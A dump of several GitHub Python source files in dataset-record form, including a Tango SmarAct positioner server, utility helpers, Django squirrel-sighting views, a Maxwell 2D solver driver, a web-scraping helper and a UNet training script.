Conversion factor is: {0:e}\".format(self._conv_factor))\n\n # Variable to store attributes\n self._pos = self.dev.GetPosition(self.axis) * self._conv_factor\n self._vel = self.dev.GetVelocity(self.axis) * self._conv_factor\n self._acc = self.dev.GetAcceleration(self.axis) * self._conv_factor\n self._mdone = not st.is_moving()\n self._iscal = st.is_calibrated()\n self._isref = st.is_referenced()\n self.debug_stream(\"Initialized attributes\")\n\n # Check if device is calibrated\n if not st.is_calibrated():\n self.debug_stream(\"Positioner not calibrated at INIT. Starting calibration\")\n self.Calibrate()\n\n if self.autoreference and not st.is_referenced():\n self.Reference()\n\n def delete_device(self):\n \"\"\" Delete device\n \"\"\"\n try:\n self._terminate = True\n if self._th is not None:\n self._th.join()\n except Exception as e:\n self.debug_stream(\"Error: {0!s}\".format(e))\n\n def initialize_dynamic_attributes(self):\n \"\"\" Initialize dynamic attributes\n \"\"\"\n pass\n\n def command_allowed(self, attr=None):\n \"\"\" Check device state\n \"\"\"\n if self.get_state() == PT.DevState.FAULT:\n if attr is None:\n PT.Except.throw_exception(\"Fault state\", \"Command not allowed because device is in fault state\", \"SmarActPositioner::command_allowed()\")\n else:\n return False\n else:\n return True\n\n def ConvertPosition(self, value):\n return float(value) * self._conv_factor\n\n def ConvertVelocity(self, value):\n return float(value) * self._conv_factor\n\n def ConvertAcceleration(self, value):\n return float(value) * self._conv_factor\n\n @PTS.command(dtype_in=None, doc_in='', dtype_out=None, doc_out='')\n def Stop(self):\n \"\"\" Stop movement\n \"\"\"\n self.command_allowed()\n self.dev.Stop(self.axis)\n\n @PTS.command(dtype_in=None, doc_in='', dtype_out=None, doc_out='')\n def Calibrate(self):\n \"\"\" Calibration routine\n \"\"\"\n self.command_allowed()\n self.debug_stream(\"Starting calibration\")\n try:\n # Check calibration options\n opt = CalibrationOptions(self.dev.GetCalibrationOptions(self.axis))\n self.debug_stream(\"Current calibration options: {0:d}\".format(opt.getValue()))\n\n ref = SensorType(self.dev.GetSensorReferenceType(self.axis))\n self.debug_stream(\"Reference type: {0:d}\".format(ref.getValue()))\n\n # Check if positioner has multiple reference marks\n if ref.isDistanceCoded():\n opt.setDetectCodeInversion(True)\n else:\n opt.setDetectCodeInversion(False)\n\n # Enable advanced sensor correction\n # TODO: should check that the positioner is Stick-Slip Piezo\n opt.setAdvancedSensorCorrection(True)\n self.debug_stream(\"New calibration options: {0:d}\".format(opt.getValue()))\n self.dev.SetCalibrationOptions(np.array([self.axis, opt.getValue()], dtype=np.int32))\n\n # Start calibration\n self.dev.Calibrate(self.axis)\n\n except PT.DevFailed as e:\n self.error_stream(\"Calibration failed (Error: {0!s})\".format(e.args[0].desc))\n PT.Except.re_throw_exception(e, \"Calibration failed\", \"Calibration failed\", \"SmarActPositioner::Calibrate()\")\n except Exception as e:\n self.error_stream(\"Calibration failed (Error: {0!s})\".format(e))\n PT.Except.throw_exception(\"Calibration failed\", \"Calibration failed (Error: {0!s})\".format(e), \"SmarActPositioner::Calibrate()\")\n\n @PTS.command(dtype_in=None, doc_in='', dtype_out=None, doc_out='')\n def Reference(self):\n \"\"\" Referencing routine\n \"\"\"\n self.command_allowed()\n self.debug_stream(\"Booking reference move\")\n self._do_reference = True\n\n def DoReference(self):\n # Check referencing options\n 
try:\n # Relative move before referencing\n if self.ref_movebefore != 0.0:\n pos = self.dev.GetPosition(self.axis)\n new_pos = pos + int(self.ref_movebefore / self._conv_factor)\n self.dev.Move(np.array([self.axis, new_pos], np.int64))\n self.waitForMotionDone()\n\n opt = ReferencingOptions(self.dev.GetReferencingOptions(self.axis))\n ref = SensorType(self.dev.GetSensorReferenceType(self.axis))\n self.debug_stream(\"Reference type: {0:d}\".format(ref.getValue()))\n\n # Check if we have to reverse reference direction\n opt.setStartDirection(self.ref_reverse)\n\n # If the positioner has multiple distance-coded reference marks, set inversion after the first reference to reduce movement\n if ref.isDistanceCoded():\n opt.setReverseDirection(True)\n else:\n opt.setReverseDirection(False)\n\n self.dev.SetReferencingOptions(np.array([self.axis, opt.getValue()], dtype=np.int32))\n self.debug_stream(\"Referencing options: {0:d}\".format(opt.getValue()))\n\n # Start referencing\n self.dev.Reference(self.axis)\n self.waitForMotionDone()\n\n except PT.DevFailed as e:\n self.error_stream(\"Referencing failed (Error: {0!s})\".format(e.args[0].desc))\n except Exception as e:\n self.error_stream(\"Referencing failed (Error: {0!s})\".format(e))\n\n self._do_reference = False\n\n def waitForMotionDone(self):\n while True:\n time.sleep(0.2)\n st = AxisState(self.dev.AxisState(self.axis))\n if st.is_moving() or st.is_calibrating() or st.is_referencing():\n continue\n else:\n break\n\n def PollingThread(self):\n\n self.debug_stream(\"Polling thread started\")\n polling = float(self.polling) / 1000.0\n\n count = 0\n while not self._terminate:\n s = time.time()\n\n if self.get_state() != PT.DevState.FAULT:\n # Poll only if state is not FAULT\n\n # Handle referencing\n if self._do_reference:\n self.DoReference()\n\n # Poll state\n try:\n st = AxisState(self.dev.AxisState(self.axis))\n\n if self.get_logger().is_debug_enabled():\n self.debug_stream(\"Polled state: {0:d} ({1!s})\".format(st.getValue(), st))\n\n new_state = None\n if st.is_moving() or st.is_calibrating() or st.is_referencing():\n if self._mdone:\n self._mdone = False\n self.push_change_event(\"MotionDone\", self._mdone)\n new_state = PT.DevState.MOVING\n\n else:\n if not self._mdone:\n self._mdone = True\n self.push_change_event(\"MotionDone\", self._mdone)\n new_state = PT.DevState.STANDBY\n\n if st.move_failed():\n new_state = PT.DevState.FAULT\n err_code = self.dev.GetLastError(self.axis)\n self.error_stream(\"Move failed with error: {0:d}\".format(err_code))\n\n elif st.over_temperature():\n new_state = PT.DevState.ALARM\n\n self.set_state(new_state)\n\n if self._iscal != st.is_calibrated():\n self._iscal = st.is_calibrated()\n self.push_change_event(\"IsCalibrated\", self._iscal)\n\n if self._isref != st.is_referenced():\n self._isref = st.is_referenced()\n self.push_change_event(\"IsReferenced\", self._isref)\n\n # Poll position\n pos = self.dev.GetPosition(self.axis) * self._conv_factor\n\n if self.get_logger().is_debug_enabled():\n self.debug_stream(\"Polled position: {0:.3f}\".format(pos))\n\n if pos != self._pos:\n self._pos = pos\n self.push_change_event(\"Position\", self._pos)\n\n except PT.DevFailed as e:\n self.error_stream(\"Device polling failed. 
Errors:\")\n for i in range(len(e.args)):\n self.error_stream(\"[{0:d}] {1!s} ({2!s})\".format(i, e.args[i].desc, e.args[i].origin))\n\n else:\n if count > 10:\n count = 0\n # Try to reconnect to device\n try:\n self.initialize_device()\n self.set_state(PT.DevState.STANDBY)\n except PT.DevFailed:\n self.error_stream(\"Failed to reconnect with device\")\n else:\n count += 1\n\n elapsed = time.time() - s\n if elapsed < polling:\n time.sleep(polling - elapsed)\n\n @PTS.attribute(name=\"Position\", label=\"Position\", dtype=PT.DevDouble, doc=\"Axis position\")\n def Position(self):\n return self._pos\n\n @Position.write\n def wPosition(self, value):\n self.debug_stream(\"Write Position: {0:f}\".format(value))\n\n # Convert position to device units\n pos = int(value / self._conv_factor)\n\n # Start move\n self.dev.Move(np.array([self.axis, pos], np.int64))\n self.set_state(PT.DevState.MOVING)\n\n def is_Position_allowed(self, attr):\n general = self.command_allowed(attr)\n if not general:\n return False\n if general and attr != PT.AttReqType.READ_REQ and self.get_state() != PT.DevState.STANDBY:\n return False\n else:\n return True\n\n @PTS.attribute(name=\"Velocity\", label=\"Velocity\", dtype=PT.DevDouble, format=\"%.2f\", unit=\"um/s\", doc=\"Axis velocity\", fisallowed='command_allowed')\n def Velocity(self):\n return self._vel\n\n @Velocity.write\n def wVelocity(self, value):\n self.debug_stream(\"Write velocity {0!s}\".format(value))\n\n if value == self._vel:\n return\n\n # Convert velocity to device unit\n vel = int(value / self._conv_factor)\n\n # Write velocity to device\n self.dev.SetVelocity(np.array([self.axis, vel], dtype=np.int64))\n\n time.sleep(0.1)\n\n # Check written value\n new_vel = self.dev.GetVelocity(self.axis)\n\n if new_vel != vel:\n self.error_stream(\"Failed to set velocity (set={0:d}, actual={1:d})\".format(vel, new_vel))\n PT.Except.throw_exception(\"Failed to set velocity\", \"Failed to set velocity (set={0:d}, actual={1:d})\".format(vel, new_vel), \"SmarActPositioner::wVelocity()\")\n\n # Push change event\n self._vel = value\n self.push_change_event(\"Velocity\", self._vel)\n\n @PTS.attribute(name=\"Acceleration\", label=\"Acceleration\", dtype=PT.DevDouble, format=\"%.2f\", unit=\"um/s^2\", doc=\"Axis acceleration\", fisallowed='command_allowed')\n def Acceleration(self):\n return self._acc\n\n @Acceleration.write\n def wAcceleration(self, value):\n self.debug_stream(\"Write acceleration {0!s}\".format(value))\n\n if value == self._acc:\n return\n\n # Convert acceleration to device unit\n acc = int(value / self._conv_factor)\n\n # Write acceleration to device\n self.dev.SetAcceleration(np.array([self.axis, acc], dtype=np.int64))\n\n time.sleep(0.1)\n\n # Check written value\n new_acc = self.dev.GetAcceleration(self.axis)\n\n if new_acc != acc:\n self.error_stream(\"Failed to set acceleration (set={0:d}, actual={1:d})\".format(acc, new_acc))\n PT.Except.throw_exception(\"Failed to set acceleration\", \"Failed to set acceleration (set={0:d}, actual={1:d})\".format(acc, new_acc), \"SmarActPositioner::wAcceleration()\")\n\n # Push change event\n self._acc = value\n self.push_change_event(\"Acceleration\", self._acc)\n\n @PTS.attribute(name=\"MotionDone\", label=\"Motion done\", dtype=PT.DevBoolean, doc=\"Motion done\", fisallowed='command_allowed')\n def MotionDone(self):\n return self._mdone\n\n @PTS.attribute(name=\"IsReferenced\", label=\"Is referenced\", dtype=PT.DevBoolean, doc=\"Axis is referenced\", fisallowed='command_allowed')\n def IsReferenced(self):\n return self._isref\n\n @PTS.attribute(name=\"IsCalibrated\", label=\"Is calibrated\", dtype=PT.DevBoolean, doc=\"Axis is calibrated\", 
fisallowed='command_allowed')\n def IsCalibrated(self):\n return self._iscal\n\n\nif __name__ == \"__main__\":\n # Start device server\n try:\n PTS.run((SmarActPositioner, ))\n except PT.DevFailed as e:\n print(\"Tango exception: {:}\".format(e.args[0].desc))\n except Exception as e:\n print(\"Python exception: {:}\".format(repr(e)))\n","repo_name":"udyni/tango","sub_path":"SmarActController/SmarActPositioner.py","file_name":"SmarActPositioner.py","file_ext":"py","file_size_in_byte":18227,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"20884558682","text":"from typing import List, Optional, OrderedDict\nfrom os.path import isdir, isfile, join\nimport re\nimport os\nimport json\nimport string\nimport yaml\nimport random\nfrom typing import Union\n\ndef read_json(json_filepath):\n with open(json_filepath, \"r\") as fd:\n return json.load(fd)\n\ndef read_yaml(file: str):\n with open(file) as fd:\n return yaml.safe_load(fd)\n\ndef write_yaml(data, file):\n with open(file, \"w\") as fd:\n return yaml.safe_dump(data, fd)\n\n\ndef write_json(data, file):\n with open(file, \"w\") as fd:\n return json.dump(data, fd, separators=(\",\", \":\"))\n\ndef randstr(len: int = 32):\n return \"\".join(random.choice(string.ascii_letters + string.digits) for _ in range(len))\n\ndef randsubdirs(rootdir: str, len= 0, baselen=0):\n return [join(rootdir, randstr(baselen)) for _ in range(len)]\n\ndef listdirs(rootdir: str):\n try:\n return [dir for dir in os.listdir(rootdir) if isdir(join(rootdir, dir))]\n except FileNotFoundError:\n return []\n\n\ndef listfiles(rootdir: str):\n try:\n return [file for file in os.listdir(rootdir) if isfile(join(rootdir, file))]\n except FileNotFoundError:\n return []\n\n\n\n\ndef makenumberedsubdirs(rootdir: str, t: int, f: int = 1, override_names: bool = False):\n subdirs = listdirs(rootdir)\n offset = 0\n if not override_names and len(subdirs) > 0:\n num_dirs = sorted([dir for dir in subdirs if dir.isdigit()], key=int, reverse=True)\n if len(num_dirs) > 0:\n offset = int(num_dirs[0])\n\n return [join(rootdir, str(dir)) for dir in range(offset + f, offset + t + f)]\n\ndef dictList2ListDict(dictlist: dict):\n list_dict, dictlist_idxs = [], {k:0 for k, v in dictlist.items() if type(v) == list}\n done = False\n while not done:\n d = {}\n for k, v in dictlist.items():\n d[k] = v if type(v) != list else v[dictlist_idxs[k]]\n\n for idx, k in enumerate(dictlist_idxs.keys()):\n if idx != (len(dictlist_idxs) - 1):\n if dictlist_idxs[k] == (len(dictlist[k]) - 1):\n dictlist_idxs[k] = 0\n else:\n dictlist_idxs[k] += 1\n break\n elif idx == (len(dictlist_idxs) - 1):\n if dictlist_idxs[k] == (len(dictlist[k]) - 1):\n done = True\n else:\n dictlist_idxs[k] += 1\n break\n list_dict.append(d)\n if len(dictlist_idxs) == 0:\n break\n return list_dict\n\n\ndef rawparse_args(rawoptions: str):\n matches = re.findall(r'(?:--?)([\\w-]+)(.*?)(?= -|$)', rawoptions)\n result = {}\n for m in matches:\n val: str = m[1].strip()\n if not val:\n result[m[0]] = True\n elif val.isdigit():\n result[m[0]] = int(val)\n elif re.fullmatch(r'\\d+\\.\\d+', val):\n result[m[0]] = float(val)\n else:\n result[m[0]] = val\n return result\n\ndef dictargs2str(dictargs: OrderedDict) -> str:\n cmd = \"\"\n for argname, argval in dictargs.items():\n if type(argval) == bool:\n options = f\" --{argname}\" if argval == True else \"\"\n elif type(argval) == list:\n options = f\" 
--{argname} {','.join(argval)}\"\n else:\n options = f\" --{argname} {argval}\"\n cmd += options\n return cmd\n\ndef append_basename(dirs: list[str], base: str):\n return [join(dir, base) for dir in dirs]\n\n\ndef prepend_dir(dirs: list[str], dirname: str):\n return [join(dirname, dir) for dir in dirs]\n\ndef get_subdirs(rootdir: str, filter: Optional[str] = None, to_exclude = [], custom_filter=None):\n if filter == \"folder\":\n subdirs = [subdir for subdir in listdirs(rootdir) if (not subdir in to_exclude)]\n\n elif filter == \"file\":\n subdirs = [subdir for subdir in listfiles(rootdir) if (not subdir in to_exclude)]\n\n elif filter == \"custom\" and custom_filter:\n try:\n subdirs = [subdir for subdir in os.listdir(rootdir) if (not subdir in to_exclude) and custom_filter(subdir)]\n except FileNotFoundError:\n subdirs = []\n\n else:\n try:\n subdirs = [subdir for subdir in os.listdir(rootdir) if (not subdir in to_exclude)]\n except FileNotFoundError:\n subdirs = []\n\n subdirs.sort(key=lambda x: os.stat(join(rootdir, x)).st_ctime, reverse=True)\n return subdirs\n\ndef maplist(array: list, fun):\n return [fun(it) for it in array]\n\ndef runlist(array: list, fun):\n for item in array:\n fun(item)\n\ndef maplistindex(array: list, fun):\n return [fun(indx, item) for indx, item in enumerate(array)]\n\ndef get_valdicts(dicts: list[dict], key: str):\n return [d[key] for d in dicts]\n","repo_name":"lakhalouahid/torch-utils","sub_path":"src/torch_utils/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"28550359139","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.forms import ModelForm\nimport random\nfrom django.db.models import Sum, Count\n\nfrom .models import Sighting\n\nclass SightingForm(ModelForm):\n class Meta:\n model = Sighting\n fields = '__all__'\n\ndef sighting_list(request):\n template='sightings/list.html'\n sightings = Sighting.objects.all()\n context = {\n 'sightings' : sightings,\n }\n return render(request, template, context)\n\n\ndef sighting_add(request):\n template='sightings/add.html'\n form = SightingForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect(reverse('sighting_list'))\n return render(request, template, {'form':form})\n\ndef sighting_update(request, squirrel_id):\n template='sightings/update.html'\n sighting = get_object_or_404(Sighting, pk=squirrel_id)\n form = SightingForm(request.POST or None, instance=sighting)\n if request.method=='POST' and 'update' in request.POST:\n if form.is_valid():\n form.save()\n return redirect(reverse('sighting_list'))\n return render(request, template, {'form':form})\n\ndef sighting_stats(request):\n template = 'sightings/stats.html'\n stats_list = [\n Sighting.objects.aggregate(total_squirrels_number = Count('squirrel_id')),\n Sighting.objects.filter(age ='Adult').aggregate(Adult_number = Count('squirrel_id')),\n Sighting.objects.filter(age ='Juvenile').aggregate(Juvenile_num = Count('squirrel_id')),\n Sighting.objects.filter(fur_color='Gray').aggregate(Gray_number = Count('squirrel_id')),\n Sighting.objects.filter(running ='True').aggregate(Running_number = 
Count('squirrel_id')),\n ]\n sighting_list=[]\n for sighting in stats_list:\n sighting_list.append([list(sighting.keys())[0],list(sighting.values())[0]])\n context = {'stats':sighting_list,}\n return render(request, template, context)\n","repo_name":"QikangSong/Squirrel-Tracker","sub_path":"mysite/sightings/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2743454158","text":"class Solution:\n def maximalSquare(self, matrix):\n if not matrix or not matrix[0]:\n return 0\n # print(\"Hello\")\n m = len(matrix)\n n = len(matrix[0])\n for i in range(m):\n print(matrix[i])\n ans =0\n temp = [0]*n\n dp =[[0]*n for i in range(m)]\n print(temp)\n for i in range(m):\n\n dp[i][0] = int(matrix[i][0])\n for j in range(1,n):\n if matrix[i][j] == '1':\n # dont check if i=0\n dp[i][j] = 1+min(dp[i][j-1],dp[i-1][j],dp[i-1][j-1])\n ans = max(ans,max(dp[i]))\n\n print(ans**2)\n\nA = [[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]]\n# print(A)\ns=Solution()\ns.maximalSquare(A)","repo_name":"nikhil3991/Problem_Solving","sub_path":"DP/Maximal Square.py","file_name":"Maximal Square.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1202285900","text":"import numpy as np\nfrom meshing_functions import MeshReaderGambit2D\nfrom node_mappings import Nodes2D, xytors, GeometricFactors2D\nfrom diff_matrices import Dmatrices2D, Vandermonde2D, GradVandermonde2D\nfrom surface_ints import Lift2D\nfrom normals import Normals2D\nfrom connectivity_maps import tiConnect2D, BuildMaps2D\nfrom Maxwell2D import Maxwell2D\n\n\ndef StartUp2D(NODETOL, N, Nv, VX, VY, K, EToV):\n\n # some important constants\n Nfp = N+1 # number of nodes on a face\n Np = int((N+1)*(N+2)/2) # number of nodes in each element\n Nfaces=3 # number of faces in each element\n \n # compute nodal set\n x_tmp, y_tmp = Nodes2D(N) # finds good interpolation points on eq tri. 
using warp and blend\n r, s = xytors(x_tmp,y_tmp) # maps x and y to r and s, points on the standard triangle |\n\n # create the computational components (Vandermond matrix, Mass Matrix, \n # and differention matrices\n V = Vandermonde2D(N, r, s)\n invV = np.linalg.inv(V)\n MassMatrix = invV.T*invV\n Dr, Ds = Dmatrices2D(N,r,s,V)\n\n # Build coordinates of all the nodes\n va = EToV[:, 0].T - 1 # vector of first node in each element\n vb = EToV[:, 1].T - 1 # second node in each element\n vc = EToV[:, 2].T - 1 # third node in each element\n\n # Reshape the VX and VY arrays to match the required shape\n VX = VX.reshape(-1, 1) # Shape: (146, 1)\n VY = VY.reshape(-1, 1) # Shape: (146, 1)\n\n # Affine mapping from r,s set of well-behaved interpolation points,\n # to the computational points, x and y in the physical grid\n x = 0.5 * (-(r + s) * VX[va] + (1 + r) * VX[vb] + (1 + s) * VX[vc]) # Shape: (66, 1)\n y = 0.5 * (-(r + s) * VY[va] + (1 + r) * VY[vb] + (1 + s) * VY[vc]) # Shape: (66, 1)\n x = x.T\n y = y.T\n\n # Find all the nodes that lie on each edge\n # this is needed to calculate the surface integral\n fmask1 = np.where(np.abs(s+1) < NODETOL)[0]\n fmask2 = np.where(np.abs(r+s) < NODETOL)[0]\n fmask3 = np.where(np.abs(r+1) < NODETOL)[0]\n Fmask = np.concatenate((fmask1, fmask2, fmask3)).T\n Fx = x[Fmask, :]\n Fy = y[Fmask, :]\n\n # change the form of Fmask to work with later arrays\n Fmask = np.column_stack((fmask1, fmask2, fmask3))\n\n # Create surface integral terms\n # allows the computation of the surface integral on the faces of the \n # element and the subsequent incorporation of that information into the \n # overall solution within the element.\n LIFT = Lift2D(N, Np, Nfaces, Nfp, r, s, Fmask, V)\n\n # calculate geometric factors\n # nx(i,k) is the n^{hat} component of normal at face noide i on element k\n # J = Volume Jacobian\n # sJ = Jacobian at surface nodes\n # Fscale(i,k) = ratio of surface to volume Jacobian of face i on element k\n rx, sx, ry, sy, J = GeometricFactors2D(x, y, Dr, Ds) # metric constants\n nx, ny, sJ = Normals2D(K, Nfp, x, y, Dr, Ds, Fmask)\n Fscale = sJ / J[Fmask.flatten()]\n\n # build connectivity matrix\n EToE, EToF = tiConnect2D(EToV)\n\n # build connectivity maps\n mapM, mapP, vmapM, vmapP, vmapB, mapB = BuildMaps2D(NODETOL, K, Np, Nfp, Nfaces, Fmask, EToV, EToE, EToF, VX, VY, x, y)\n Vr, Vs = GradVandermonde2D(N, r, s)\n Drw = np.dot(np.dot(V, Vr.T), np.linalg.inv(np.dot(V, V.T)))\n Dsw = np.dot(np.dot(V, Vs.T), np.linalg.inv(np.dot(V, V.T)))\n\n return Np, Nfp, Nfaces, K, vmapM, vmapP, vmapB, mapB, x, y, r, s, nx, ny, rx, sx, ry, sy, Dr, Ds, LIFT, Fscale\n\nif __name__ == \"__main__\":\n N = 10 # polynomial order used for approximation\n NODETOL = 1e-12 # used to find nodes on the edge\n \n # read in mesh from file\n Nv, VX, VY, K, EToV = MeshReaderGambit2D('Maxwell025.neu')\n\n # run startup script to find all computational elements needed for the time loop\n Np, Nfp, Nfaces, K, vmapM, vmapP, vmapB, mapB, x, y, r, s, nx, ny, rx, sx, ry, sy, Dr, Ds, LIFT, Fscale = StartUp2D(NODETOL, N, Nv, VX, VY, K, EToV)\n\n # set initial conditions\n mmode = 1\n nmode = 1\n Ez = np.sin(mmode * np.pi * x) * np.sin(nmode * np.pi * y)\n Hx = np.zeros((Np, K))\n Hy = np.zeros((Np, K))\n\n # solve problem\n FinalTime = 1\n Hx,Hy,Ez,time = Maxwell2D(NODETOL, N, Np, Nfp, Nfaces, vmapM, vmapP, vmapB, mapB, K, x, y, r, s, nx, ny, Hx, Hy, Ez, FinalTime, Dr, Ds, rx, ry, sx, sy, LIFT, 
Fscale)\n","repo_name":"lukebodm/EM_nodal_DG","sub_path":"MaxwellDriver2D.py","file_name":"MaxwellDriver2D.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"42941084483","text":"\"\"\"\nGet value by url path\n\n__author__: ShadMod\n\"\"\"\n\nfrom bs4 import BeautifulSoup\nfrom requests import get as requests_get\n\n\"\"\"\ne.g.\n\nclean = [\"<p>\", \"</p>\"]\npathurl = []\nfor url in pathurl:\n scrape_text(url, \"div\", class_=\"mw-parser-output\", tag=\"p\", clean=clean)\n\"\"\"\n\n\ndef scrape_text(\n url, content, id_=None, class_=None, name_=None, tag=None, clean=False, content_nr: int = 0,\n ret_type: str = \"str\",\n):\n \"\"\"\n content => str: tag that contains the desired values (big container)\n (e.g. div, span, table, ...)\n id_ => tag id\n class_ => tag class\n name_ => tag name\n tag => str: tag to filter all html tag (detailed container)\n (e.g. div, span, table, p, ...)\n clean => str or list of value to be removed\n \"\"\"\n\n # get page html by url and take soup parser\n page = requests_get(url)\n soup = BeautifulSoup(page.text, \"html.parser\")\n\n # set attrs dict\n attrs = {}\n if id_:\n attrs[\"id\"] = id_\n if class_:\n attrs[\"class\"] = class_\n if name_:\n attrs[\"name\"] = name_\n\n if content and attrs and tag:\n # find all with params and take the chosen tag as a string\n soup_container = soup.findAll(content, attrs=attrs)\n soup_tag = str(getattr(soup_container[content_nr], tag))\n\n if clean:\n text = soup_tag\n for key_tag in clean:\n text = text.replace(key_tag, \"\")\n return text\n else:\n return soup_tag\n\n if ret_type == \"str\":\n return str(soup.findAll(tag, attrs=attrs))\n elif ret_type == \"list\":\n return list(soup.findAll(tag, attrs=attrs))\n else:\n return str(soup.findAll(tag, attrs=attrs))\n","repo_name":"shadMod/python_scrape","sub_path":"bin/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"21701471336","text":"from torch.utils.data import DataLoader\nfrom collections import OrderedDict\nfrom collections import namedtuple\nfrom itertools import product\nimport time\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.tensorboard import SummaryWriter\nimport pandas as pd\nfrom torch.nn import DataParallel\n\nfrom UNet_full_network import *\nfrom datainporter import *\n\nism_folder = 'ISM_Train'\nconf_folder = 'Conf_Train'\n\n\nclass RunBuilder():\n @staticmethod\n def get_runs(params):\n Run = namedtuple('Run', params.keys())\n\n runs = []\n for v in product(*params.values()):\n runs.append(Run(*v))\n\n return runs\n\n\nclass RunManager():\n\n def __init__(self):\n self.epoch_count = 0\n self.epoch_loss = 0\n self.epoch_acc = 0\n self.epoch_start_time = None\n\n self.run_params = None\n self.run_count = 0\n self.run_data = []\n self.run_start_time = None\n\n self.network = None\n self.loader = None\n\n def begin_run(self, run, network, loader):\n self.run_start_time = time.time()\n\n self.run_params = run\n self.run_count += 1\n\n self.network = network\n self.loader = loader\n self.tb = SummaryWriter(comment=f'-{run}')\n\n def end_run(self):\n self.tb.close()\n self.epoch_count = 0\n\n def begin_epoch(self):\n self.epoch_start_time = time.time()\n\n self.epoch_count += 1\n self.epoch_loss = 0\n self.epoch_acc = 0\n\n def end_epoch(self):\n epoch_duration = time.time() - 
self.epoch_start_time\n run_duration = time.time() - self.run_start_time\n\n loss = self.epoch_loss\n acc = self.epoch_acc/dataset_size\n self.tb.add_scalar('Loss', loss, self.epoch_count)\n self.tb.add_scalar('Epoch time', epoch_duration, self.epoch_count)\n self.tb.add_scalar('Accuracy', acc, self.epoch_count)\n for name, param in self.network.named_parameters():\n self.tb.add_histogram(name, param, self.epoch_count)\n self.tb.add_histogram(f'{name}.grad', param.grad, self.epoch_count)\n\n results = OrderedDict()\n results[\"run\"] = self.run_count\n results[\"epoch\"] = self.epoch_count\n results['loss'] = loss\n results['accuracy'] = acc\n results['epoch duration'] = epoch_duration\n results['run duration'] = run_duration\n for k, v in self.run_params._asdict().items(): results[k] = v\n self.run_data.append(results)\n\n # df = pd.DataFrame.from_dict(self.run_data, orient='columns')\n # print(df)\n\n def track_loss(self, loss):\n self.epoch_loss += loss.item() * self.loader.batch_size\n\n def track_acc(self, acc):\n self.epoch_acc += acc\n\n\ndef correct(outputs, mask):\n outputs = outputs > 0.9\n hold = np.logical_and(outputs, mask)\n return (hold.sum().numpy())\n\n\ndataset = superdata(conf_folder, ism_folder, 6, 3)\nvalidation_split = 0\nepochs = 5000\n\ndataset_size = dataset.__len__()\nindices = list(range(dataset_size))\nsplit = int(np.floor(validation_split * dataset_size))\ntrain_indices, val_indices = indices[split:], indices[:split]\ntrain_sampler = SubsetRandomSampler(train_indices)\nval_sampler = SubsetRandomSampler(val_indices)\n\nparams = OrderedDict(lr=[0.1], batch_size=[1], momentum=[0.99], criterion=[nn.MSELoss()])\nm = RunManager()\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nfor run in RunBuilder.get_runs(params):\n network = UNet(n_channels=1, n_classes=1)\n network = network.to(device)\n train_loader = DataLoader(dataset, batch_size=run.batch_size, shuffle=False, sampler=train_sampler)\n val_loader = DataLoader(dataset, batch_size=run.batch_size, shuffle=False, sampler=val_sampler)\n\n\n criterion = run.criterion\n\n optimiser = torch.optim.SGD(network.parameters(), lr=run.lr, momentum=run.momentum)\n\n m.begin_run(run, network, train_loader)\n for epoch in range(epochs):\n m.begin_epoch()\n for batch in train_loader:\n images, masks = batch\n images = images.to(device=device, dtype=torch.float32)\n mask_type = torch.float32 if network.n_classes == 1 else torch.long\n masks = masks.to(device=device, dtype=mask_type)\n images = images.unsqueeze(1)\n masks = masks.unsqueeze(1)\n\n pred = network(images)\n\n loss = criterion(pred, masks)\n acc = accuracy(pred,masks,0.05)[0]\n m.track_loss(loss)\n m.track_acc(acc)\n optimiser.zero_grad()\n loss.mean().backward()\n optimiser.step()\n\n # \"\"\" Save model when training has optimised it\"\"\"\n if epoch + 1 in [100,200,300,500,750,1000,2000,3000,4000,5000]:\n torch.save(network.state_dict(),\n 'UNet_lr{}_bs{}_mom{}_epoch{}.pth'.format(run.lr, run.batch_size, run.momentum, epoch))\n\n # \"\"\"Code for validation\"\"\"\n # total_loss_val = 0\n # for val_batch in val_loader:\n # val_images, val_masks = val_batch\n # val_images = val_images.to(device=device, dtype=torch.float32)\n # val_masks = val_masks.to(device=device, dtype=mask_type)\n # val_images = val_images.unsqueeze(1)\n # val_masks = val_masks.unsqueeze(1)\n # val_pred = network(val_images)\n # val_loss = criterion(val_pred, val_masks)\n # total_loss_val += val_loss.item()\n # print(\"lr:\", run.lr, \" epoch:\", epoch + 1, \" avg 
loss:\", total_loss_val / split)\n\n m.end_epoch()\n m.end_run()\n\n\n\n# mask_new = masks.to(device='cpu')\n# mask_new = mask_new.squeeze()\n# mask_new = mask_new.squeeze()\n# mask_new = mask_new.detach().numpy()\n# np.save('mask', mask_new)\n# temp = outputs.cpu()\n# temp = temp.detach().numpy()\n# np.save('output', temp)\n","repo_name":"Jonathan-07/UNet","sub_path":"UNet_training.py","file_name":"UNet_training.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
